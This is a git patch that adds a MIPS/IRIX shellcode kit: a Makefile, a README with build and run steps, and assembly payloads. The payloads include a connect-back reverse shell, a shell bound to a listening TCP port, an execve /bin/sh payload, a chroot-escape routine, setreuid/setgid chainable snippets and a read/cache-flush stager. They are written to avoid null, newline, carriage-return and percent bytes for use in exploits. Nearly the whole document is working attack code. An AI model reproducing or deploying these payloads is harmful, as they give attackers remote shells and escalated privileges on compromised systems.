From c9cbeced5b3f2bdd7407e29c0811e65954132540 Mon Sep 17 00:00:00 2001
From: Root THC
Date: Tue, 24 Feb 2026 12:42:47 +0000
Subject: initial

---
 other/shellkit/mips_irix/Makefile      |  22 ++++++
 other/shellkit/mips_irix/README        |  25 +++++++
 other/shellkit/mips_irix/chmod.s       |  49 +++++++++++++
 other/shellkit/mips_irix/chroot.s      |  60 ++++++++++++++++
 other/shellkit/mips_irix/connectsh.s   | 109 ++++++++++++++++++++++++++++
 other/shellkit/mips_irix/execvesh.s    |  36 ++++++++++
 other/shellkit/mips_irix/exit.s        |  29 ++++++++
 other/shellkit/mips_irix/portshellsh.s | 126 +++++++++++++++++++++++++++++++++
 other/shellkit/mips_irix/read.s        |  51 +++++++++++++
 other/shellkit/mips_irix/setgid.s      |  30 ++++++++
 other/shellkit/mips_irix/setreuid.s    |  32 +++++++++
 11 files changed, 569 insertions(+)
 create mode 100644 other/shellkit/mips_irix/Makefile
 create mode 100644 other/shellkit/mips_irix/README
 create mode 100644 other/shellkit/mips_irix/chmod.s
 create mode 100644 other/shellkit/mips_irix/chroot.s
 create mode 100644 other/shellkit/mips_irix/connectsh.s
 create mode 100644 other/shellkit/mips_irix/execvesh.s
 create mode 100644 other/shellkit/mips_irix/exit.s
 create mode 100644 other/shellkit/mips_irix/portshellsh.s
 create mode 100644 other/shellkit/mips_irix/read.s
 create mode 100644 other/shellkit/mips_irix/setgid.s
 create mode 100644 other/shellkit/mips_irix/setreuid.s

(limited to 'other/shellkit/mips_irix')

diff --git a/other/shellkit/mips_irix/Makefile b/other/shellkit/mips_irix/Makefile
new file mode 100644
index 0000000..a68d231
--- /dev/null
+++ b/other/shellkit/mips_irix/Makefile
@@ -0,0 +1,22 @@
+
+#DFLAGS=-O2
+DFLAGS=-g -ggdb
+CC=gcc
+CFLAGS=$(DFLAGS) -Wall -DIRIX
+
+all:
+	$(CC) $(CFLAGS) -o chmod ../codedump.c chmod.s
+	$(CC) $(CFLAGS) -o chroot ../codedump.c chroot.s
+	$(CC) $(CFLAGS) -o connectsh ../codedump.c connectsh.s
+	$(CC) $(CFLAGS) -o execvesh ../codedump.c execvesh.s
+	$(CC) $(CFLAGS) -o exit ../codedump.c exit.s
+	$(CC) $(CFLAGS) -o portshellsh ../codedump.c portshellsh.s
+	$(CC) $(CFLAGS) -o read ../codedump.c read.s
+	$(CC) $(CFLAGS) -o setgid ../codedump.c setgid.s
+	$(CC) $(CFLAGS) -o setreuid ../codedump.c setreuid.s
+
+clean:
+	rm -f code.h codetest \
+		chmod chroot connectsh execvesh exit portshellsh read \
+		setgid setreuid
+
diff --git a/other/shellkit/mips_irix/README b/other/shellkit/mips_irix/README
new file mode 100644
index 0000000..a78c668
--- /dev/null
+++ b/other/shellkit/mips_irix/README
@@ -0,0 +1,25 @@
+
+mips/irix shellcodes
+some comments in this file
+
+
+for execvesh and portshellsh append "/bin/sh\x42" to the code.
+
+if you want to execute something different than "/bin/sh", be sure to properly
+set the first four bytes to a valid opcode ("/bin" is valid) or insert a nop
+and adjust the self-relocation.
+
+the codedump utility build extra cache control syscalls, so it flushes all
+caches properly and you can run the code safily then from a flushed cache.
+
+example:
+
+scut@hyperion $ make >/dev/null
+scut@hyperion $ ./execvesh
+  <... dumps the hexcode ...>
+scut@hyperion $ ./execvesh exec
+len = 68
+$
+$ exit
+scut@hyperion $
+
diff --git a/other/shellkit/mips_irix/chmod.s b/other/shellkit/mips_irix/chmod.s
new file mode 100644
index 0000000..181c123
--- /dev/null
+++ b/other/shellkit/mips_irix/chmod.s
@@ -0,0 +1,49 @@
+/* MIPS/IRIX PIC chmod code
+ *
+ * -sc.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+	/* FIXME: its not workable atm */
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+lbl:	bltzal	zero, lbl
+
+	li	a1, 0x4141	/* a1 = uid ^ 0x5555 */
+	xor	a1, a1, 0x5555
+	li	a2, 0x4242	/* a2 = gid ^ 0x5555 */
+	xor	a2, a2, 0x555
+
+	addu	a0, ra, 0x0180
+	sb	zero, -(0x0148 + -(9))(a0)
+	subu	a0, a0, 0x0148
+
+	/* chown (a0 = pathname, a1 = uid, a2 = gid) */
+	li	v0, SYS_chown	/* 0x03f8 */
+	syscall
+
+	/* chmod (a0 = pathname, a1 = 04755) */
+	li	a1, 0x09ed	/* a1 = 04755 = 0x09ed */
+	li	v0, SYS_chmod	/* 0x03f7 */
+	syscall
+
+	li	v0, SYS_exit	/* 0x03e9 */
+	syscall
+	li	t8, 0x72ec	/* sane ds */
+
+	.end	cbegin
+cend:
+
+	/* XXX: append pathname here, will get NUL terminated */
diff --git a/other/shellkit/mips_irix/chroot.s b/other/shellkit/mips_irix/chroot.s
new file mode 100644
index 0000000..96a1595
--- /dev/null
+++ b/other/shellkit/mips_irix/chroot.s
@@ -0,0 +1,60 @@
+/* MIPS/IRIX PIC chroot break
+ * without 0x00, 0x0a, 0x0d, 0x25
+ *
+ * -sc.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+foo:	bltzal	zero, foo
+	li	a1, 0700	/* a1 = 0700 permission */
+
+	/* mkdir ("Y..", 0700);
+	 */
+	lui	t2, 0x592e
+	ori	t2, 0x2cff	/* t1 = "Y..\x00" */
+	add	t2, t2, 0x0101
+	sw	t2, -48(ra)
+
+	subu	a0, ra, 48	/* a0 = "Y.." */
+	li	v0, SYS_mkdir	/* 0x0438 */
+	syscall
+
+	/* chroot ("Y..");
+	 * a0 still points to it
+	 */
+	addu	v0, a1, (SYS_chroot - 0700)	/* v0 = SYS_chroot (0x0425) */
+	syscall
+
+	/* chdir ("..") a few times
+	 */
+	li	s2, 0x1211	/* 12 times chdir ("..") */
+
+foo2:	subu	a0, ra, 47	/* "..\x00" */
+	li	v0, SYS_chdir	/* 0x03f4 */
+	syscall
+	sub	s2, 0x0101
+	bgez	s2, foo2
+
+	addu	v0, s2, 0x0426	/* bds: SYS_chroot (0x0425) + 1 */
+	subu	a0, ra, 46	/* ".\x00" */
+	syscall
+	li	t2, 0x7350	/* NOP */
+
+	.end	cbegin
+cend:
+	nop
+
diff --git a/other/shellkit/mips_irix/connectsh.s b/other/shellkit/mips_irix/connectsh.s
new file mode 100644
index 0000000..7b77d4e
--- /dev/null
+++ b/other/shellkit/mips_irix/connectsh.s
@@ -0,0 +1,109 @@
+/* MIPS/IRIX PIC connect shell shellcode
+ * no 0x00, 0x0a, 0x0d, 0x25 bytes
+ *
+ * -sc
+ */
+
+	/* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+#include <elf.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+	/* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
+	 */
+	li	s6, 0x7350
+	subu	a0, s6, 0x734e	/* AF_INET = 2 */
+	subu	a1, s6, 0x734e	/* SOCK_STREAM = 2 */
+	subu	a2, s6, 0x734a	/* IPPROTO_TCP = 6 */
+	li	v0, SYS_socket	/* 0x0453 */
+	syscall
+
+	/* socket returned in v0, save to a0
+	 */
+	andi	a0, v0, 0xffff		/* a0 = socket */
+
+	/* build struct sockaddr_in
+	 * 0x0002port 0x_IP-addr_ 0x00000000 0x00000000
+	 */
+	subu	t2, s6, 0x734e		/* t2 = 0x0002 */
+	sh	t2, -16(sp)
+	li	t2, 0x4141		/* t2 = port number */
+	sh	t2, -14(sp)
+
+	/* ip address */
+	lui	t2, 0x4142
+	ori	t2, t2, 0x4344
+	sw	t2, -12(sp)
+
+	sw	zero, -8(sp)
+	sw	zero, -4(sp)
+
+	/* connect (socket, (struct sockaddr *) cs,
+	 *	sizeof (struct sockaddr_in)
+	 */
+	subu	a2, s6, 0x7340	/* a2 = sizeof (struct sockaddr_in) = 0x10 */
+	subu	a1, sp, a2	/* a1 = (struct sockaddr *) */
+	li	v0, SYS_connect	/* 0x0443 */
+	syscall
+
+	/* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
+	 */
+	subu	s3, s6, 0x431e	/* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
+
+	/* socket returned in v0, save in s7
+	 */
+	andi	s7, a0, 0xffff
+
+	/* dup is emulated through close and fcntl, since irix offers no
+	 * native dup syscall as for example linux. see phrack 56 for details
+	 */
+dup_loop:
+	andi	a0, s3, 0x0103	/* a0 = STD*_FILENO */
+	li	v0, SYS_close	/* 0x03ee */
+	syscall
+
+	andi	a0, s7, 0xffff	/* a0 = socket */
+	slti	a1, zero, -1	/* a1 = 0 */
+	andi	a2, s3, 0x0103	/* a2 = STD*_FILENO */
+	li	v0, SYS_fcntl	/* 0x0426 */
+	syscall
+
+	subu	s3, 0x1011
+	bgez	s3, dup_loop
+
+	/* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
+	 */
+	sw	zero, -4(sp)
+
+	/* a2 (envp) is already zero due to the dup_loop
+	 */
+gaddr:	bltzal	zero, gaddr	/* rock on-. lsd */
+	subu	a1, sp, 8
+
+	/* ra contains the proper address now */
+	addu	ra, ra, 0x0120	/* add 32 + 0x0100 */
+
+	add	a0, ra, -(8 + 0x100)
+	sb	zero, -(1 + 0x100)(ra)	/* store NUL */
+	sw	a0, -8(sp)
+	li	v0, SYS_execve
+	syscall
+
+	.end	cbegin
+cend:
+
+	/* XXX append here: "/bin/sh\x42" */
+
diff --git a/other/shellkit/mips_irix/execvesh.s b/other/shellkit/mips_irix/execvesh.s
new file mode 100644
index 0000000..89fd45b
--- /dev/null
+++ b/other/shellkit/mips_irix/execvesh.s
@@ -0,0 +1,36 @@
+/* MIPS/IRIX PIC execve code
+ *
+ * -sc.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+	sw	zero, -4(sp)
+foo:	bltzal	zero, foo
+	lw	a2, -4(sp)
+
+	addu	ra, ra, 0x0124	/* add 36 + 0x0100 */
+
+	add	a0, ra, -(8 + 0x100)
+	sb	zero, -(1 + 0x100)(ra)
+	sw	a0, -8(sp)
+	subu	a1, sp, 8
+	li	v0, SYS_execve
+	syscall
+
+	.end	cbegin
+cend:
+
diff --git a/other/shellkit/mips_irix/exit.s b/other/shellkit/mips_irix/exit.s
new file mode 100644
index 0000000..aef7d01
--- /dev/null
+++ b/other/shellkit/mips_irix/exit.s
@@ -0,0 +1,29 @@
+/* MIPS/IRIX PIC exit code
+ *
+ * -sc.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+	/* _exit (0) */
+	slti	a0, zero, -1
+	li	v0, SYS_exit	/* 0x03e9 */
+	syscall
+	li	t8, 0x7350
+
+	.end	cbegin
+cend:
+
diff --git a/other/shellkit/mips_irix/portshellsh.s b/other/shellkit/mips_irix/portshellsh.s
new file mode 100644
index 0000000..18070f6
--- /dev/null
+++ b/other/shellkit/mips_irix/portshellsh.s
@@ -0,0 +1,126 @@
+/* MIPS/IRIX PIC listening port shellcode
+ * no 0x00, 0x0a, 0x0d, 0x25 bytes
+ *
+ * bind a shell to tcp port 0x4141
+ *
+ * 2001/05/25 optimized from 368 down to 188 bytes -sc.
+ *
+ */
+
+	/* XXX: replace syscall instructions with "\x01\x01\x01\x0c" */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+#include <elf.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+	/* socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)
+	 */
+	li	s6, 0x7350
+	subu	a0, s6, 0x734e	/* AF_INET = 2 */
+	subu	a1, s6, 0x734e	/* SOCK_STREAM = 2 */
+	subu	a2, s6, 0x734a	/* IPPROTO_TCP = 6 */
+	li	v0, SYS_socket	/* 0x0453 */
+	syscall
+
+	/* socket returned in v0, save to a0
+	 */
+	andi	a0, v0, 0xffff		/* a0 = socket */
+
+	/* build struct sockaddr_in
+	 * 0x0002port 0x00000000 0x00000000 0x00000000
+	 */
+	subu	t2, s6, 0x734e		/* t2 = 0x0002 */
+	sh	t2, -16(sp)
+	li	t2, 0x4141		/* t2 = port number */
+	sh	t2, -14(sp)
+	sw	zero, -12(sp)
+	sw	zero, -8(sp)
+	sw	zero, -4(sp)
+
+	/* bind (socket, (struct sockaddr *) srv_addr,
+	 *	sizeof (struct sockaddr_in)
+	 */
+	subu	a2, s6, 0x7340	/* a2 = sizeof (struct sockaddr_in) = 0x10 */
+	subu	a1, sp, a2	/* a1 = (struct sockaddr *) */
+	li	v0, SYS_bind	/* 0x0442 */
+	syscall
+
+	/* listen (socket, backlog)
+	 * XXX: is it safe here to make backlog = pointer-on-the-stack ?
+	 *      should be, since its still a positive number
+	 */
+/*	subu	a1, s6, 0x7340	*//* a1 = backlog = 0x10 */
+	li	v0, SYS_listen	/* 0x0448 */
+	syscall
+
+	/* accept (socket, (struct sockaddr *) cl_addr,
+	 *	&socklen)
+	 * XXX: a1 is still the pointer to the sockaddr struct
+	 * a2 should be 0x10 still
+	 */
+	sw	a2, -20(sp)
+	subu	a2, sp, 20	/* a2 = &socklen */
+	li	v0, SYS_accept	/* 0x0441 */
+	syscall
+
+
+	/* dup2 (sock, 0), dup2 (sock, 1), dup2 (sock, 2)
+	 */
+	subu	s3, s6, 0x431e	/* s3 = 0x3032 (0x3030 = dummy, 0x0002 = STDERR_FILENO) */
+
+	/* socket returned in v0, save in s7
+	 */
+	andi	s7, v0, 0xffff
+
+	/* dup is emulated through close and fcntl, since irix offers no
+	 * native dup syscall as for example linux. see phrack 56 for details
+	 */
+dup_loop:
+	andi	a0, s3, 0x0103	/* a0 = STD*_FILENO */
+	li	v0, SYS_close	/* 0x03ee */
+	syscall
+
+	andi	a0, s7, 0xffff	/* a0 = socket */
+	slti	a1, zero, -1	/* a1 = 0 */
+	andi	a2, s3, 0x0103	/* a2 = STD*_FILENO */
+	li	v0, SYS_fcntl	/* 0x0426 */
+	syscall
+
+	subu	s3, 0x1011
+	bgez	s3, dup_loop
+
+	/* execve ("/bin/sh", &{"/bin/sh",NULL}, NULL)
+	 */
+	sw	zero, -4(sp)
+
+	/* a2 (envp) is already zero due to the dup_loop
+	 */
+gaddr:	bltzal	zero, gaddr	/* rock on-. lsd */
+	subu	a1, sp, 8
+
+	/* ra contains the proper address now */
+	addu	ra, ra, 0x0120	/* add 32 + 0x0100 */
+
+	add	a0, ra, -(8 + 0x100)
+	sb	zero, -(1 + 0x100)(ra)	/* store NUL */
+	sw	a0, -8(sp)
+	li	v0, SYS_execve
+	syscall
+
+	.end	cbegin
+cend:
+
+	/* XXX append here: "/bin/sh\x42" */
+
diff --git a/other/shellkit/mips_irix/read.s b/other/shellkit/mips_irix/read.s
new file mode 100644
index 0000000..90ab25d
--- /dev/null
+++ b/other/shellkit/mips_irix/read.s
@@ -0,0 +1,51 @@
+/* MIPS/IRIX PIC read/cacheflush code
+ *
+ * -sc.
+ *
+ * some note:
+ * since the data that is read in is treated in the data cache, you may
+ * experience a data/instruction cache incoherence, where the instruction
+ * cache still contains the old memory contents. to avoid this, send a lot
+ * of data, first the shellcode and then a huge bogus space of nops, which
+ * are to flush the data cache, later making the instruction cache populated
+ * with the real shellcode. or do it as we do it here, use a cacheflush
+ * syscall. this is only possible if this code is already in icache, so for
+ * the usual exploitation situation that does not help much.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+foo:	bltzal	zero, foo
+	slti	a0, zero, -1
+
+	addu	ra, ra, (0x0101 + 48)
+	subu	a1, ra, 0x0101
+
+	li	a2, 0x1010	/* read 0x1010 bytes max */
+	li	v0, SYS_read
+	syscall
+
+	subu	a0, ra, 0x0101	/* data was read to here */
+	li	a1, 0x1010	/* should be cacheline aligned */
+	li	t2, -4
+	not	a2, t2		/* BCACHE = 0x03 */
+	li	v0, SYS_cachectl	/* 0x047e */
+	syscall
+	li	t8, 0x7350	/* has to be a sane bds */
+
+	.end	cbegin
+cend:
+
diff --git a/other/shellkit/mips_irix/setgid.s b/other/shellkit/mips_irix/setgid.s
new file mode 100644
index 0000000..3223892
--- /dev/null
+++ b/other/shellkit/mips_irix/setgid.s
@@ -0,0 +1,30 @@
+/* MIPS/IRIX PIC setgid chainable code
+ *
+ * -sc.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+	/* setgid (a0) */
+	li	a0, 0x4141	/* gid ^ 0x5555 */
+	xor	a0, a0, 0x5555
+	li	v0, SYS_setgid	/* 0x0416 */
+	syscall
+	li	t8, 0x7350
+
+	.end	cbegin
+cend:
+
diff --git a/other/shellkit/mips_irix/setreuid.s b/other/shellkit/mips_irix/setreuid.s
new file mode 100644
index 0000000..9578262
--- /dev/null
+++ b/other/shellkit/mips_irix/setreuid.s
@@ -0,0 +1,32 @@
+/* MIPS/IRIX PIC setreuid chainable code
+ *
+ * -sc.
+ */
+
+#include <sgidefs.h>
+#include <sys/regdef.h>
+#include <sys/asm.h>
+#include <sys.s>
+#include <sys/syscall.h>
+
+	.section .text
+
+	.globl	cbegin
+	.globl	cend
+
+cbegin:
+	.set	noreorder
+	.set	nomacro
+
+	/* setreuid (a0, a1) */
+	li	a0, 0x4141		/* ruid ^ 0x5555 */
+	li	a1, 0x4242		/* euid ^ 0x5555 */
+	xor	a0, a0, 0x5555
+	xor	a1, a1, 0x5555
+	li	v0, SYS_setreuid	/* 0x0464 */
+	syscall
+	li	t8, 0x7350
+
+	.end	cbegin
+cend:
+
-- 
cgit v1.3